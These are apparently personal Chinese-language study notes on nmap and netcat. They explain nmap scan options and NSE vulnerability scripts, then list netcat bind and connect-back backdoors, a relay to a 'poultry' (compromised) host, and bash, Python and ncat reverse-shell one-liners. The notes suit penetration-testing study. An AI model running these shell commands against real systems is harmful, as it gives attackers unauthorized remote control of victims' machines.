namp & ncat
--dns-servers
		是复数,主要用于内部架设的dns服务器,外部dns无法解析.
-Pn  Treat all hosts as online --- skip host discovery
		明确知道主机存活或防火墙开启的机器,-Pn不启用探测前的ICMP请求,达到不触发防火墙的安全机制
-F fast mode scan fewer ports than the default scan 扫描100个最常用的端口
-p 		-p m-n 指定端口
		-p 80,135
		-p ssh 只能扫描ssh默认端口22 
			修改端口后,加-sV选项可识别出修改端口后的服务
		-p T:23,U:23-100  nmap默认只扫描tcp端口,tcp 和 udp 一起扫描需同时加 -sT  -sU 选项
		-p s* 
UDP 被fw屏蔽后,会显示open|filtered,但是TCP显示filtered
UDP 只有服务监听于默认端口,才会显示open,监听于非默认端口也显示open|filtered   bind例子   ncat监视端口显示closed(ncat无回应)
	
服务的指纹信息 服务的端口,服务名,版本
-A enable version detection OS detection script scanning traceroute
-T[0-5] set timing template higher is faster -A 耗时很长 -T5大大加速
-sV probe open ports to determine services/version info 实现 version detection 功能
-O os detection
-sn 	ping scan  disable port scan 
		加-v 显示所有的
		不加-v 只显示up的
-sS TCP SYN
-o[AXN] 保存为所有的,xml,文本
-e using specified interface
		
nmap四大主要功能
	1)	主机发现(host discovery)
	2)	端口扫描(port scanning)
	3)	版本侦测(version detection)
	4) 	OS侦测(operation system detection)
CIDR classless inter-domain routing
脚本相关
nmap -sV --script="version,discovery" target
nmap -sV -T5 -v --script vuln target 探测目标漏洞
nmap --script http-title|http-headers target
nmap -sS -sU -T5 --top-ports 100 ip 		TCP SYN扫描tcp,同时扫描udp,nmap-services中前100个端口(开放概率排名,nmap默认会扫描概率
最高的1000个端口)
nc
获取banner信息
echo ' '|nc -nv -w2 ip port_range	不使用z选项 kali中的可用,其他都有问题
扫描端口
nc -nvz -w2 ip port_range		可扫描外网主机
nc -l -w3 -z -v -u -p 987 < preempt.txt
nc -l -p 789 -e cmd
netcat 一切数据通过stdin/stdout实现
监听型后门
		nc -l -p 889 -e /bin/bash
nc ip port
连接型后门
		nc ip port -e /bin/bash
nc -l -p 889
-z zero I/O mode,userd for scanning  发送的数据报中不包含任何的payload
-s source address
-w seconds timeout
连接转发
	relay host:
			#!/bin/env bash
			nc ip1(poultry) port1
nc -l -p port2 -e relay.sh
	hacker:
			nc ip(relay host) port2
	poultry:
			nc -l -p port1 -e /bin/bash
netcat反弹shell(bash)
	bash -i >& /dev/tcp/ip(hacker)/port(hacker监听的port) 0>&1
	hacker:
		ncat -lvp port
python反弹shell
	python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
	hacker:
		ncat -lvp port
ncat反弹shell(不支持 -e)
	poultry:
		nc ip port|/bin/bash|nc ip port+1
	hacker:
		开启两个terminal,
		nc -lvp port 	输入命令
		nc -lvp port+1	显示结果
 
                    
                
 
                
            
         浙公网安备 33010602011771号
浙公网安备 33010602011771号